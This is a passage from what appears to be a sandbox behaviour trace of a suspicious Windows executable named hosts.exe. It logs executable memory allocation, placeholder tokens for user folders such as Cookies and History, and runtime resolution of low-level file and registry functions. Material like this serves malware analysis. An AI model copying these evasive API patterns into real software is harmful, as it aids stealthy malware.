flProtect=0x40) returned 0x32f8000 [0171.139] VirtualAlloc (lpAddress=0x32fc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x32fc000 [0171.140] VirtualAlloc (lpAddress=0x3300000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3300000 [0171.141] VirtualAlloc (lpAddress=0x3304000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3304000 [0171.142] VirtualAlloc (lpAddress=0x3308000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3308000 [0171.143] VirtualAlloc (lpAddress=0x330c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x330c000 [0171.144] VirtualAlloc (lpAddress=0x3310000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3310000 [0171.145] VirtualAlloc (lpAddress=0x3314000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3314000 [0171.162] GetKeyboardType (nTypeFlag=0) returned 4 [0171.162] GetCommandLineA () returned="C:\\windows\\hosts.exe " [0171.162] GetStartupInfoA (in: lpStartupInfo=0x28fe8c | out: lpStartupInfo=0x28fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\windows\\hosts.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0171.162] GetVersion () returned 0x1db10106 [0171.162] GetVersion () returned 0x1db10106 [0171.162] GetCurrentThreadId () returned 0xa9c [0171.162] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f988, nSize=0x105 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0171.163] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f863, nSize=0x105 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0171.163] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0171.163] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0171.169] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0171.169] lstrcpynA (in: lpString1=0x28f863, lpString2="C:\\windows\\hosts.exe", iMaxLength=261 | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0171.169] GetThreadLocale () returned 0x409 [0171.169] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x28f973, cchData=5 | out: lpLCData="ENU") returned 4 [0171.169] lstrlenA (lpString="C:\\windows\\hosts.exe") returned 20 [0171.169] lstrcpynA (in: lpString1=0x28f874, lpString2="ENU", iMaxLength=244 | out: lpString1="ENU") returned="ENU" [0171.169] LoadLibraryExA (lpLibFileName="C:\\windows\\hosts.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0171.170] lstrcpynA (in: lpString1=0x28f874, lpString2="EN", iMaxLength=244 | out: lpString1="EN") returned="EN" [0171.170] LoadLibraryExA (lpLibFileName="C:\\windows\\hosts.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0171.170] LoadStringA (in: hInstance=0x42d000, uID=0xffc2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0171.170] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x10e8ca0 [0171.171] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x33e0000 [0171.171] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x10e9ca0 [0171.172] VirtualAlloc (lpAddress=0x33e0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x33e0000 [0171.172] LoadStringA (in: hInstance=0x42d000, uID=0xffc1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffc0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffd2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffdb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffd1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffee, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffd5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffd4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffe7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffe8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffe9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffe6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0171.173] LoadStringA (in: hInstance=0x42d000, uID=0xffe4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xffe2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xffe1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xffe0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xffff, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfffe, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfffd, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfffc, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfffb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfffa, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfff9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfff8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfff7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfff6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0171.174] LoadStringA (in: hInstance=0x42d000, uID=0xfff5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0171.175] LoadStringA (in: hInstance=0x42d000, uID=0xfff3, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0171.175] LoadStringA (in: hInstance=0x42d000, uID=0xffe3, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0171.175] GetVersionExA (in: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28fe68, dwMinorVersion=0x656, dwBuildNumber=0x0, dwPlatformId=0x57935a, szCSDVersion="\x8f\x80W") | out: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0171.175] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.175] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceExA") returned 0x75b148ef [0171.175] GetThreadLocale () returned 0x409 [0171.175] GetThreadLocale () returned 0x409 [0171.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jan") returned 4 [0171.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x28fd08, cchData=256 | out: lpLCData="January") returned 8 [0171.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Feb") returned 4 [0171.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x28fd08, cchData=256 | out: lpLCData="February") returned 9 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mar") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="March") returned 6 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Apr") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="April") returned 6 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jun") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="June") returned 5 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jul") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="July") returned 5 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Aug") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="August") returned 7 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sep") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x28fd08, cchData=256 | out: lpLCData="September") returned 10 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Oct") returned 4 [0171.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x28fd08, cchData=256 | out: lpLCData="October") returned 8 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Nov") returned 4 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x28fd08, cchData=256 | out: lpLCData="November") returned 9 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Dec") returned 4 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x28fd08, cchData=256 | out: lpLCData="December") returned 9 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sun") returned 4 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sunday") returned 7 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mon") returned 4 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Monday") returned 7 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tue") returned 4 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tuesday") returned 8 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wed") returned 4 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wednesday") returned 10 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thu") returned 4 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thursday") returned 9 [0171.177] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Fri") returned 4 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Friday") returned 7 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sat") returned 4 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Saturday") returned 9 [0171.178] GetThreadLocale () returned 0x409 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x28fd64, cchData=256 | out: lpLCData="$") returned 2 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=".") returned 2 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x28fd64, cchData=256 | out: lpLCData="2") returned 2 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x28fe5c, cchData=2 | out: lpLCData="/") returned 2 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x28fd64, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0171.178] GetThreadLocale () returned 0x409 [0171.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0171.179] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x28fd64, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0171.179] GetThreadLocale () returned 0x409 [0171.179] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0171.179] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=":") returned 2 [0171.183] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x28fd64, cchData=256 | out: lpLCData="AM") returned 3 [0171.183] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x28fd64, cchData=256 | out: lpLCData="PM") returned 3 [0171.183] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0171.183] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0171.183] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0171.183] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0171.184] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x775d0000 [0171.184] GetProcAddress (hModule=0x775d0000, lpProcName="VariantChangeTypeEx") returned 0x775d4c28 [0171.184] GetProcAddress (hModule=0x775d0000, lpProcName="VarNeg") returned 0x7764c802 [0171.184] GetProcAddress (hModule=0x775d0000, lpProcName="VarNot") returned 0x7764ec66 [0171.184] GetProcAddress (hModule=0x775d0000, lpProcName="VarAdd") returned 0x775f5934 [0171.184] GetProcAddress (hModule=0x775d0000, lpProcName="VarSub") returned 0x7764d332 [0171.184] GetProcAddress (hModule=0x775d0000, lpProcName="VarMul") returned 0x7764dbd4 [0171.185] GetProcAddress (hModule=0x775d0000, lpProcName="VarDiv") returned 0x7764e405 [0171.185] GetProcAddress (hModule=0x775d0000, lpProcName="VarIdiv") returned 0x7764f00a [0171.185] GetProcAddress (hModule=0x775d0000, lpProcName="VarMod") returned 0x7764f15e [0171.185] GetProcAddress (hModule=0x775d0000, lpProcName="VarAnd") returned 0x775f5a98 [0171.185] GetProcAddress (hModule=0x775d0000, lpProcName="VarOr") returned 0x7764ecfa [0171.185] GetProcAddress (hModule=0x775d0000, lpProcName="VarXor") returned 0x7764ee2e [0171.185] GetProcAddress (hModule=0x775d0000, lpProcName="VarCmp") returned 0x775eb0dc [0171.185] GetProcAddress (hModule=0x775d0000, lpProcName="VarI4FromStr") returned 0x775e6fab [0171.186] GetProcAddress (hModule=0x775d0000, lpProcName="VarR4FromStr") returned 0x775f01a0 [0171.186] GetProcAddress (hModule=0x775d0000, lpProcName="VarR8FromStr") returned 0x775e699e [0171.186] GetProcAddress (hModule=0x775d0000, lpProcName="VarDateFromStr") returned 0x775f6ba7 [0171.186] GetProcAddress (hModule=0x775d0000, lpProcName="VarCyFromStr") returned 0x77616c12 [0171.186] GetProcAddress (hModule=0x775d0000, lpProcName="VarBoolFromStr") returned 0x775edbd1 [0171.186] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromCy") returned 0x775f7fdc [0171.186] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromDate") returned 0x775e7a2a [0171.187] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromBool") returned 0x775f0355 [0171.187] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76c60000 [0171.187] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstanceEx") returned 0x76ca9d4e [0171.187] GetProcAddress (hModule=0x76c60000, lpProcName="CoInitializeEx") returned 0x76ca09ad [0171.187] GetProcAddress (hModule=0x76c60000, lpProcName="CoAddRefServerProcess") returned 0x76cc3cf3 [0171.187] GetProcAddress (hModule=0x76c60000, lpProcName="CoReleaseServerProcess") returned 0x76cc4314 [0171.187] GetProcAddress (hModule=0x76c60000, lpProcName="CoResumeClassObjects") returned 0x76c6ea02 [0171.188] GetProcAddress (hModule=0x76c60000, lpProcName="CoSuspendClassObjects") returned 0x76ccbb02 [0171.188] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xb4 [0171.188] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb8 [0171.188] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xbc [0171.189] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3065201738921) returned 1 [0171.189] SysReAllocStringLen (in: pbstr=0x54b634*=0x0, psz="%UserProfile FOLDER%", len=0x14 | out: pbstr=0x54b634*="%UserProfile FOLDER%") returned 1 [0171.189] SysReAllocStringLen (in: pbstr=0x54b630*=0x0, psz="%SYSTEM DRIVE%", len=0xe | out: pbstr=0x54b630*="%SYSTEM DRIVE%") returned 1 [0171.189] SysReAllocStringLen (in: pbstr=0x54b62c*=0x0, psz="%Local, ApplicationData FOLDER%", len=0x1f | out: pbstr=0x54b62c*="%Local, ApplicationData FOLDER%") returned 1 [0171.189] SysReAllocStringLen (in: pbstr=0x54b628*=0x0, psz="%AllUsers, ApplicationData FOLDER%", len=0x22 | out: pbstr=0x54b628*="%AllUsers, ApplicationData FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b624*=0x0, psz="%Temp FOLDER%", len=0xd | out: pbstr=0x54b624*="%Temp FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b620*=0x0, psz="%ApplicationData FOLDER%", len=0x18 | out: pbstr=0x54b620*="%ApplicationData FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b61c*=0x0, psz="%InternetCache FOLDER%", len=0x16 | out: pbstr=0x54b61c*="%InternetCache FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b618*=0x0, psz="%Cookies FOLDER%", len=0x10 | out: pbstr=0x54b618*="%Cookies FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b614*=0x0, psz="%History FOLDER%", len=0x10 | out: pbstr=0x54b614*="%History FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b610*=0x0, psz="%My Pictures FOLDER%", len=0x14 | out: pbstr=0x54b610*="%My Pictures FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b60c*=0x0, psz="%AllUsers, Documents FOLDER%", len=0x1c | out: pbstr=0x54b60c*="%AllUsers, Documents FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b608*=0x0, psz="%Program Files, Common FOLDER%", len=0x1e | out: pbstr=0x54b608*="%Program Files, Common FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b604*=0x0, psz="%Program Files FOLDER%", len=0x16 | out: pbstr=0x54b604*="%Program Files FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b600*=0x0, psz="%My Documents FOLDER%", len=0x15 | out: pbstr=0x54b600*="%My Documents FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b5fc*=0x0, psz="%WINDOWS FOLDER%", len=0x10 | out: pbstr=0x54b5fc*="%WINDOWS FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b5f8*=0x0, psz="%SYSTEM FOLDER%", len=0xf | out: pbstr=0x54b5f8*="%SYSTEM FOLDER%") returned 1 [0171.190] SysReAllocStringLen (in: pbstr=0x54b5f4*=0x0, psz="%DEFAULT FOLDER%", len=0x10 | out: pbstr=0x54b5f4*="%DEFAULT FOLDER%") returned 1 [0171.191] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.191] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x310000 [0171.191] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.191] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0171.191] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0171.192] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0171.192] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0171.192] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReadFile") returned 0x77a7f8e0 [0171.192] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0171.192] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenFile") returned 0x77a7fd54 [0171.192] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryAttributesFile") returned 0x77a7fe4c [0171.192] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateSection") returned 0x77a7ff94 [0171.193] GetProcAddress (hModule=0x77a60000, lpProcName="ZwMapViewOfSection") returned 0x77a7fc40 [0171.193] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySection") returned 0x77a80040 [0171.193] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSection") returned 0x77a7fc70 [0171.193] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryFullAttributesFile") returned 0x77a8132c [0171.193] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0171.193] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryObject") returned 0x77a7f9e8 [0171.194] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFile") returned 0x77a7fd88 [0171.194] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenSection") returned 0x77a7fdb8 [0171.194] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDuplicateObject") returned 0x77a7fe34 [0171.194] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77a7ff7c [0171.194] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteFile") returned 0x77a809d4 [0171.194] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLockFile") returned 0x77a80e44 [0171.194] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnlockFile") returned 0x77a81ea8 [0171.200] GetProcAddress (hModule=0x77a60000, lpProcName="ZwTerminateProcess") returned 0x77a7fca0 [0171.200] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKey") returned 0x77a7fa18 [0171.200] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateValueKey") returned 0x77a7fa30 [0171.201] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryKey") returned 0x77a7fa80 [0171.201] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryValueKey") returned 0x77a7fa98 [0171.201] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateKey") returned 0x77a7fb30 [0171.201] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateKey") returned 0x77a7fd3c [0171.201] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetValueKey") returned 0x77a801b4 [0171.201] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteKey") returned 0x77a809ec [0171.201] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteValueKey") returned 0x77a80a34 [0171.202] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushKey") returned 0x77a80b70 [0171.202] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey") returned 0x77a80dfc [0171.202] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey2") returned 0x77a80e14 [0171.202] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeKey") returned 0x77a80f60 [0171.202] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryMultipleValueKey") returned 0x77a8146c [0171.202] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReplaceKey") returned 0x77a81738 [0171.202] GetProcAddress (hModule=0x77a60000, lpProcName="ZwRestoreKey") returned 0x77a817d0 [0171.203] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSaveKey") returned 0x77a81864 [0171.203] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationKey") returned 0x77a81a48 [0171.203] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnloadKey") returned 0x77a81e60 [0171.203] GetProcAddress (hModule=0x77a60000, lpProcName="ZwAccessCheck") returned 0x77a80218 [0171.203] GetProcAddress (hModule=0x77a60000, lpProcName="ZwExtendSection") returned 0x77a80b0c [0171.204] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 